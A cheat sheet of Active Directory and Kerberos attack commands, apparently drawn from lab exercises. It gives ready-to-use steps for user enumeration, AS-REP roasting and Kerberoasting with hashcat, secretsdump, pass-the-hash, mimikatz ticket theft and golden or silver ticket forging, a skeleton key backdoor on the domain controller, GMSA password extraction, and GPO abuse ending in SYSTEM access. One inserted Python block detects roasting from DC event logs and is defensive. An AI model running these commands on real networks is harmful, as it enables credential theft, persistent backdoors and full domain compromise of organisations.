# Kerberos (88) / Active Directory (AD)

## Active Directory Exploitation Cheat Sheet

[S1ckB0y1337](https://github.com/S1ckB0y1337)/[**Active-Directory-Exploitation-Cheat-Sheet**](https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet)

## Enumeration

### AD LDAP enumeration

`ldapsearch -x -h $IP -s base` to get the naming context

`ldapsearch -x -h "192.168.141.122" -b "DC=hutch,DC=offsec"` using the naming context found above

### Impacket-GetNPUsers

The command below asks the KDC for the AS-REP of every user in the list that has Kerberos pre-authentication disabled and writes the resulting hashes in hashcat format. Crack them with `hashcat` (mode 18200).

`impacket-GetNPUsers THM-AD/ -usersfile valid_users.txt -dc-ip 10.10.199.242 -format hashcat -outputfile npusers.hashcat`

`hashcat -m 18200 -a 0 npusers.hashcat passwordlist.txt`

### Kerbrute Enumeration - No domain access required

`./kerbrute userenum --dc $IP -d $NetbiosDomainName ~/THM/kerbrute-room/users.lst`

### impacket-secretsdump - Authenticated user

`impacket-secretsdump -just-dc THM-AD/backup:backup2517860@10.10.113.122`

### Pass the Hash through Evil-WinRM

`evil-winrm -i 10.10.199.242 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc`

### Pass the Ticket - Access as a user to the domain required

`rubeus.exe harvest /interval:30` (harvest TGTs from memory every 30 seconds)

`Rubeus.exe brute /password:Password1 /noticket` (password spray: try the given password against every domain user without writing tickets to disk)

### Kerberoasting - Access as any user required

#### Rubeus Method

`Rubeus.exe kerberoast`

Now that you have some hashes, save them into a text file and crack them with hashcat (mode 13100 for `$krb5tgs$23$` RC4 hashes).

`hashcat -m 13100 -a 0 hash.txt Pass.txt`

#### Impacket Method

`sudo python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py controller.local/Machine1:Password1 -dc-ip 10.10.77.32 -request`

### AS-REP Roasting - Access as any user required

`rubeus.exe asreproast`

When adding the hashes to a text file, remember to insert `23$` after `$krb5asrep$` (Rubeus omits the etype) so that each line begins with `$krb5asrep$23$User...`; hashcat mode 18200 expects that format.

`hashcat -m 18200 hash.txt pass.txt`
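Both Kerberoasting and AS-REP roasting leave a trace on the domain controller: event 4769 (TGS request) with an RC4 ticket for a user-account SPN, and event 4768 (AS request) with PreAuthType 0. The following is an added detection example, not part of the original cheat sheet; it runs over constructed event records whose keys mirror the EventData names of those two events, and the threshold value is an assumption.

```python
RC4_HMAC = "0x17"   # TicketEncryptionType RC4-HMAC: the offline-crackable etype
PREAUTH_NONE = "0"  # PreAuthType 0: no pre-authentication was performed
SUCCESS = "0x0"     # Status 0x0: the KDC actually issued the ticket

def is_kerberoast_candidate(evt):
    """4769 (TGS-REQ) that issued an RC4 service ticket for a user-account SPN."""
    if evt.get("EventID") != "4769" or evt.get("Status") != SUCCESS:
        return False
    svc = evt.get("ServiceName", "")
    if svc.lower() == "krbtgt" or svc.endswith("$"):
        return False  # TGT renewals and machine accounts are not roastable
    return evt.get("TicketEncryptionType") == RC4_HMAC

def is_asrep_roast_candidate(evt):
    """4768 (AS-REQ) answered without pre-authentication, with an RC4 etype."""
    return (evt.get("EventID") == "4768" and evt.get("Status") == SUCCESS
            and evt.get("PreAuthType") == PREAUTH_NONE
            and evt.get("TicketEncryptionType") == RC4_HMAC)

def triage(events, sweep_threshold=3):
    """(technique, user, detail) findings. Kerberoasting is reported only once an
    account has pulled RC4 tickets for sweep_threshold distinct SPNs (a sweep)."""
    spns, findings = {}, []
    for e in events:
        if is_kerberoast_candidate(e):
            spns.setdefault(e["TargetUserName"], set()).add(e["ServiceName"])
        elif is_asrep_roast_candidate(e):
            findings.append(("asrep_roast", e["TargetUserName"], e["IpAddress"]))
    for user, names in spns.items():
        if len(names) >= sweep_threshold:
            findings.append(("kerberoast_sweep", user, ",".join(sorted(names))))
    return findings

def ev(event_id, user, **fields):
    """Constructed event record; keys mirror the 4768/4769 EventData names."""
    base = {"EventID": event_id, "TargetUserName": user, "Status": SUCCESS,
            "IpAddress": "::ffff:10.10.77.50"}
    base.update(fields)
    return base

# Constructed sample: a sweep by Machine1, benign AES traffic from alice, one
# account with pre-auth disabled, and a failed AS-REQ (0x6) that must not count.
SAMPLE_EVENTS = [
    ev("4769", "Machine1", ServiceName="SQLService", TicketEncryptionType="0x17"),
    ev("4769", "Machine1", ServiceName="svc_web", TicketEncryptionType="0x17"),
    ev("4769", "Machine1", ServiceName="svc_mssql", TicketEncryptionType="0x17"),
    ev("4769", "alice", ServiceName="DC01$", TicketEncryptionType="0x12"),
    ev("4768", "svc_backup", PreAuthType="0", TicketEncryptionType="0x17"),
    ev("4768", "bob", PreAuthType="0", TicketEncryptionType="0x17", Status="0x6"),
]
```

Accounts with AES-only service tickets (etype 0x12) never trip the first rule, which is why enforcing AES on service accounts and disabling `DONT_REQ_PREAUTH` removes most of this signal.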

### Pass the Ticket w/ mimikatz

Run `mimikatz.exe`

Run `privilege::debug` and make sure it outputs `Privilege '20' OK`

`sekurlsa::tickets /export`

Look for a `.kirbi` file belonging to an account you want to act as, such as the `Administrator` account.

Run `kerberos::ptt $ticketFile` to inject the given ticket into the current session

Exit mimikatz and run `klist` to confirm you are using the cached ticket

You should now have Domain Admin rights

### Golden/Silver Ticket Attacks w/ mimikatz

* Golden ticket: forge a TGT signed with the krbtgt hash, which the KDC will then exchange for a service ticket to any service you want.
  * Full domain compromise (domain admin) required
* Silver ticket: forge a service ticket (TGS) for one specific service using that service account's hash, so you can impersonate any user to that service.
  * Service account hash required
* Skeleton Key: patch LSASS on the domain controller so a master password is accepted for every account.
  * Full domain compromise (domain admin) required

Run mimikatz

`privilege::debug` to confirm access

`lsadump::lsa /inject /name:krbtgt` dumps the krbtgt hash and the other identifiers needed to create a golden ticket. To create a silver ticket, change `/name:` to dump the hash of either a domain admin account or a service account such as the SQLService account.

You will need to know the user's RID (the trailing part of the SID, typically the last 3-4 digits) for the next mimikatz command. You can find it by running the command below.

```
wmic useraccount where name='%username%' get sid
```

`kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-432953485-3795405108-1502158860 /krbtgt:72cd714611b64cd4d5550cd2759db3f6 /id:500` This is the command for creating a golden ticket; to create a silver ticket, put the service account's NTLM hash into the `/krbtgt:` slot, the SID of the service account into `/sid:`, and change the `/id:` to 1103.

`misc::cmd` opens a new elevated command prompt with the ticket mimikatz just created. You now have the permissions of whichever ticket (golden or silver) you used.

### Dump all NTLM hashes with mimikatz

`lsadump::lsa /patch`

Crack with `hashcat -a 0 -O -m 1000 $hash /usr/share/wordlists/rockyou.txt`

### Kerberos Backdoors w/ mimikatz

`misc::skeleton` installs the skeleton key in the domain controller's LSASS; until the DC reboots, the master password `mimikatz` is accepted alongside every account's real password.

`net use c:\\DOMAIN-CONTROLLER\admin$ /user:Administrator mimikatz`

`dir \\Desktop-1\c$ /user:Machine1 mimikatz`

## Exploitation

### Group Managed Service Accounts (GMSA)

Group Managed Service Accounts provide a higher-security option for non-interactive applications, services, processes, or tasks that run automatically but need a credential.

These service accounts are given automatically generated passwords that are rotated by the domain. Given certain permissions, it is possible to retrieve these passwords (and therefore their hashes) from Active Directory. To see which users or groups are allowed to do that for a given service account, look up the `PrincipalsAllowedToRetrieveManagedPassword` property on the account.

`Get-ADServiceAccount -Identity $serviceAcc -Properties * | Select PrincipalsAllowedToRetrieveManagedPassword`

If we have access to an account that is listed in that property, directly or through group membership, we can read the `msDS-ManagedPassword` attribute and derive the service account's password hash.

```
*Evil-WinRM* PS C:\Users\enox\Documents> Get-ADServiceAccount -Identity svc_apache -Properties 'msDS-ManagedPassword'


DistinguishedName    : CN=svc_apache,CN=Managed Service Accounts,DC=heist,DC=offsec
Enabled              : True
msDS-ManagedPassword : {1, 0, 0, 0...}
Name                 : svc_apache
ObjectClass          : msDS-GroupManagedServiceAccount
ObjectGUID           : d40bc264-0c4e-4b86-b3b9-b775995ba303
SamAccountName       : svc_apache$
SID                  : S-1-5-21-537427935-490066102-1511301751-1105
UserPrincipalName    :



*Evil-WinRM* PS C:\Users\enox\Documents> $gmsa = Get-ADServiceAccount -Identity 'svc_apache' -Properties 'msDS-ManagedPassword'
*Evil-WinRM* PS C:\Users\enox\Documents> $mp = $gmsa.'msDS-ManagedPassword'
*Evil-WinRM* PS C:\Users\enox\Documents> $mp
1
0
0
0
36
...
```

The attribute is returned as a byte array, so we have the `ReadGMSAPassword` privilege on the `svc_apache` account.

We can turn the blob into Kerberos keys with [GMSAPasswordReader](https://github.com/CsEnox/tools/raw/main/GMSAPasswordReader.exe).

```
*Evil-WinRM* PS C:\Users\enox\Documents> C:/Users/enox/Documents/GMSAPasswordReader.exe --accountname svc_apache
Calculating hashes for Old Value
[*] Input username             : svc_apache$
[*] Input domain               : HEIST.OFFSEC
[*] Salt                       : HEIST.OFFSECsvc_apache$
[*]       rc4_hmac             : EA5055089775D4E018B085C20648D794
[*]       aes128_cts_hmac_sha1 : 4AD57573D862D85482A24107EE8A48AC
[*]       aes256_cts_hmac_sha1 : 8DD276B6CD4EDC9497448ED17FB66842736291C3A109A905C584B84508635795
[*]       des_cbc_md5          : 312FDCDA9DADDCCD

Calculating hashes for Current Value
[*] Input username             : svc_apache$
[*] Input domain               : HEIST.OFFSEC
[*] Salt                       : HEIST.OFFSECsvc_apache$
[*]       rc4_hmac             : DEB6F85CF5EAE0951DD89F4AFD884AE5
[*]       aes128_cts_hmac_sha1 : C5A97007F3CA002059FD8A98962760D0
[*]       aes256_cts_hmac_sha1 : 0DA099CCCBE0C0D6F5EB06E465B7CF05FF069E5E625DD10DA009CA9A795E6E8F
[*]       des_cbc_md5          : 9E340723700454E9

```

We now have the service account's password hash (the `rc4_hmac` value under "Current Value" is the NTLM hash) and can use it for pass-the-hash logins. Note that evil-winrm needs the `$` sign at the end of the username when logging in with the hash.

### ZeroLogon

The full exploit resets the domain controller's machine account password and will break Active Directory, so only run the check mode to confirm whether the DC is vulnerable.

`python3 zerologon.py -do check -target ATTACKTIVEDIRECT -ip $IP`

### GPO Abuse via SharpGPOAbuse

If our user holds the `GpoEditDeleteModifySecurity` permission on a GPO, we can give ourselves local administrator privileges through it. Confirm this by running `Get-NetGPO`, taking the GPO's name GUID string, and running it through `Get-GPPermission -Guid 31B2F340-016D-11D2-945F-00C04FB984F9 -TargetType User -TargetName anirudh`

`./SharpGPOAbuse.exe --AddLocalAdmin --UserAccount anirudh --GPOName "Default Domain Policy"`

`gpupdate /force` applies the updated Group Policy

`net localgroup Administrators` verifies we are now in the Administrators group

`python3 /usr/share/doc/python3-impacket/examples/psexec.py vault.offsec/anirudh:SecureHM@192.168.120.116` to get SYSTEM access

